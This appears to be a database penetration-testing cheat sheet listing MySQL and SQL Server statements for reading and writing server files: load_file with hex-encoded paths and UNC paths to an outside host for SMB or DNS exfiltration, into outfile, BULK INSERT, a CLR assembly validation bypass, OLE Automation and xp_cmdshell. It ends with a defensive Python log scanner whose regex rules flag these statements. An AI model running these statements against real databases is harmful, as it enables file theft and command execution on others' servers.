I. MySQL
Read files
The path passed to load_file can be written as a hexadecimal string literal instead of a quoted string.
select load_file('C:/boot.ini');
select load_file(0x633a2f626f6f742e696e69);
select load_file('//ecma.io/1.txt'); # SMB protocol
select load_file('\\\\ecma.io\\1.txt'); # can be used for DNS tunneling
Write files
I currently know two file writing methods:
select 0x313233 into outfile 'd:/1.txt';
select 0x313233 into dumpfile 'd:/1.txt';
II. SQL Server
Read files
1. BULK INSERT
create table results (res varchar(8000));
bulk insert results from 'd:/1.txt';
2. CLR integration
-- Enable CLR integration
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'clr enabled', 1;
reconfigure;
create assembly sqb from 'd:\1.exe' with permission_set = unsafe;
The create assembly statement above can load any .NET binary file from the remote server into the database. However, it verifies that the file is a valid .NET program, so loading any other file fails. The loaded content is read back as follows.
select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files;
Bypass: first load a valid .NET binary file, then append the target file to that assembly. The bypass looks like this.
create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt';
alter assembly sqb add file from 'd:\notnet.exe';
3. Scripting.FileSystemObject
-- Enable Ole Automation Procedures
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'Ole Automation Procedures', 1;
reconfigure;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while (@ret = 0)
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end
Write files
1. Scripting.FileSystemObject
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'E:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'This is the test string'
2. bcp file copy (test failed: no bcp.exe)
C:\windows\system32> bcp "select name from sysobjects" queryout testout.txt -c -S 127.0.0.1 -U sa -P "sa"
3. xp_cmdshell
exec xp_cmdshell 'echo test> d:\1.txt'
III. Oracle
Skipped: Oracle has too many pitfalls. Almost all of the methods are restricted by PL/SQL.
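For defenders, the MySQL and SQL Server statements above are recognizable in query or audit logs. The following is an added example, not code from the original page: a small Python scanner that flags those statements and decodes 0x literals, so that a hex-encoded path such as the load_file one above is visible to a reviewer. The rule names, function names and sample log lines are constructed for illustration.

```python
import re

# Rules for the file read/write statements listed on this page (names are illustrative).
PATTERNS = {
    "mysql load_file": r"\bload_file\s*\(",
    "mysql into outfile/dumpfile": r"\binto\s+(?:out|dump)file\b",
    "mssql bulk insert": r"\bbulk\s+insert\b",
    "mssql create/alter assembly": r"\b(?:create|alter)\s+assembly\b",
    "mssql ole automation": r"\bsp_oa(?:create|method)\b",
    "mssql xp_cmdshell": r"\bxp_cmdshell\b",
    "mssql sp_configure toggle": r"\bsp_configure\s+'\s*(?:clr enabled|ole automation procedures|xp_cmdshell)\s*'\s*,\s*1\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in PATTERNS.items()}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)

def decode_hex_literals(sql):
    """Return printable decodings of 0x... literals so hex-encoded paths become readable."""
    out = []
    for m in HEX_LITERAL.finditer(sql):
        text = bytes.fromhex(m.group(1)).decode("latin-1")
        if text.isprintable():
            out.append(text)
    return out

def scan(statement):
    """Return (matched rule names, decoded hex strings) for one logged statement."""
    hits = [name for name, rx in COMPILED.items() if rx.search(statement)]
    decoded = decode_hex_literals(statement) if hits else []
    return hits, decoded

# Constructed sample log: statements from this page plus one benign query.
SAMPLE_LOG = [
    "select load_file(0x633a2f626f6f742e696e69)",
    "select 0x313233 into dumpfile 'd:/1.txt'",
    "exec sp_configure 'clr enabled', 1",
    "exec xp_cmdshell 'echo test> d:\\1.txt'",
    "select name from customers where id = 7",
]

def report(lines=SAMPLE_LOG):
    """Return (statement, rule names, decoded literals) for every flagged line."""
    return [(line, *scan(line)) for line in lines if scan(line)[0]]

if __name__ == "__main__":
    for line, hits, decoded in report():
        print(hits, decoded, "<-", line)
```

Matching on statement text only catches what reaches the log in this form. On the server side, the same statements depend on the MySQL FILE privilege and on the SQL Server options that the page enables with sp_configure.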